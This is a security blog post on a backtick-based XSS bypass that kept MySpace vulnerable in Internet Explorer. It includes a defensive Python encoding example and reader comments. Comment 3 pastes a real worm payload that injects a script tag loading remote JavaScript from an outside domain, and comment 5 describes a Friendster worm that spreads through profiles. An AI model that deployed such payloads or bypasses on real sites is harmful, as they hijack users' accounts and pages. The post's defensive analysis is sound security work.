web application security lab

MySpace Fixes Security Hole and Continues To Be Vulnerable

This is nearly a classic case of why understanding browser differences and the nuances of XSS is vital when you’re trying to stop attacks but still allow HTML. Yup, you guessed it, MySpace is still vulnerable to cross-site scripting in exactly the same way it was before, except now it only works in Internet Explorer.

You can read the forums to get the specifics, but basically by using a grave accent (backtick) instead of a single or double quote you can evade the filters they put in place to stop Kuza55’s XSS fragmentation exploit, which he disclosed earlier this week. Pretty nasty. Maluc also posted a proof of concept on the forums that demonstrates the issue. It takes a few seconds to execute, but it’s definitely still a valid exploit against the social networking platform.
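The defensive lesson in the post is that a filter which only neutralizes the single and double quote leaves the backtick intact, and Internet Explorer of that era treated a backtick as an attribute delimiter. The Python below is an added illustration written for this page; it is not MySpace's filter or code from RSnake, Kuza55 or Maluc. The naive filter, the sample attribute value and the function names are all constructed. It contrasts a quote-only filter with the "encode every non-alphanumeric character in an attribute context" rule and shows that only the latter removes the backtick as a surviving delimiter.

```python
import re

# Attribute delimiters a browser may honour. The backtick is listed because
# Internet Explorer accepted it as an attribute quote character, which is the
# browser difference the post is about.
IE_ATTR_DELIMITERS = {'"', "'", "`"}


def naive_attr_filter(value: str) -> str:
    """A constructed filter in the spirit of one that only worries about the
    two conventional quote characters and passes everything else through."""
    return value.replace('"', "&quot;").replace("'", "&#39;")


def encode_for_attr(value: str) -> str:
    """Encode every character outside [A-Za-z0-9] as a numeric character
    reference. Browsers decode references inside attribute values, so the
    attribute still carries the intended text, but no quote character of any
    kind, backtick included, survives in raw form to terminate the value."""
    return re.sub(r"[^A-Za-z0-9]", lambda m: f"&#{ord(m.group(0))};", value)


def surviving_delimiters(attr_fragment: str) -> set:
    """Return the delimiter characters still present, unencoded, in a filtered
    attribute value. A non-empty result means the filter is insufficient for
    at least one browser's attribute parsing."""
    return {c for c in IE_ATTR_DELIMITERS if c in attr_fragment}


def render_img(src: str) -> str:
    """Build an <img> tag whose src is always double-quoted and whose value has
    been run through encode_for_attr, so user input cannot close the quote."""
    return f'<img src="{encode_for_attr(src)}">'


if __name__ == "__main__":
    # Constructed sample: a value that would break out of a backtick-delimited
    # attribute under IE while containing neither ' nor ".
    sample = "cat.jpg` title=`hello"
    print(naive_attr_filter(sample), surviving_delimiters(naive_attr_filter(sample)))
    print(encode_for_attr(sample), surviving_delimiters(encode_for_attr(sample)))
    print(render_img(sample))
```

The per-character encoder is the right tool only when you control the markup and are inserting an untrusted value into one attribute. When users are allowed to post HTML, as on MySpace, the robust approach is to parse the submitted markup and re-serialize an allow-listed subset with freshly emitted, consistently quoted attributes rather than trying to patch a regex filter one delimiter at a time.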

6 Responses to “MySpace Fixes Security Hole and Continues To Be Vulnerable”

  1. MySpace Fixes Security Hole and Continues To Be Vulnerable of Myspace Html Codes Blog Says:

    […] Original post by RSnake for Myspace News MySpace Fixes Security Hole and Continues To Be Vulnerable […]

  2. Tribute Says:

    I logged into my myspace this afternoon to see that a worm had propagated onto my page.
    The code found on my page was:

    (that’s it put together)
    The website that the .js file resides in was not responding when I noticed this on my page.
    I assume that if you change the x.src to a valid url then the xss will be working but as yet I haven’t tried it.

    Also, rsnake, I tried regging on the forums, but the link on the email is throwing up “Sorry, there was an error verifying your account. Please make sure you used the entire URL included in the email you received.” Could you fix this please :)

  3. Tribute Says:

    hmm, seems that you disallow scripts on comments (which i didn’t know). Here it is without the :
    img src="http://xss.xss/xss.jpg" x='var x=document.createElement('script');x.src='http://www.actualizando.com/…/test.js';document.getElementsByTagName('body')[0].appendChild(x);"

  4. RSnake Says:

    Hrmm… we seem to be having problems with wordpress… can you email it to me? I’ll post it. It’s worth talking about.

  5. mysticalchickenpooh Says:

    Friendster too.
    http://www.friendster.com/34517631

    I heard that a worm already spread a few months ago. Apparently, it was a flash file running js which creates and submits a form which embeds the same flash file into the viewers profile if he/she is logged in. Friendster got a little smarter and inserted allowScriptAccess="never" attribute on to your embedded flash file. But forget the flash file, the input is still vulnerable anyway.

    It is being used to generate overlays for profiles.
    http://friendster-tweakers.com/markyctrigger-overlay-generator/

    I think it also has an auto-testimonial submission (the user not knowing he/she already gave away a testimonial) thing and a “who’s viewed me” thing regardless of the user’s privacy settings.

  6. Demetrius Says:

    Anyone else having bother with myspace or is it just my pc?
    Last couple of days it seems it won’t let me download any song from anywhere.
    Anyone having the same bother - or does anyone know how to sort it?
